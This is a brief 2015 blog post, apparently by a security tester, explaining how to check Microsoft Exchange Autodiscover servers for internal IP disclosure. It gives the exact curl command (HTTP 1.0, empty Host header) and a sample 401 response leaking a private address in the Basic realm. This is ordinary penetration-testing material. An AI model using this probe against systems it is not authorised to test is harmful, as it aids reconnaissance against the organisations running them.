Tuesday, August 25, 2015

Testing for Microsoft Exchange Autodiscover Internal IP Disclosure

So it turns out that if you request your target's autodiscover XML file without specifying a host, it will put its internal IP into the realm of the Basic WWW-Authenticate response header. One important thing that people don't seem to mention is that you need to request the XML file using HTTP 1.0, not curl's default of 1.1. Below is the curl line I tend to use to test for it:
curl -i -k https://targetip/autodiscover/autodiscover.xml -0 -H "Host:"

HTTP/1.1 401 Unauthorized
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-SOAP-Enabled: True
X-WSSecurity-Enabled: True
X-WSSecurity-For: None
X-AspNet-Version: 2.0.50727
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
WWW-Authenticate: Basic realm="192.168.50.30"
X-Powered-By: ASP.NET
Connection: close
Content-Length: 58

If you leave out the -0 (which makes curl speak HTTP 1.0), you will get a 400 Bad Request instead.
If your request includes a value in the Host header, the server will place that value in the realm instead of the internal IP, so an empty Host header is what triggers the disclosure.
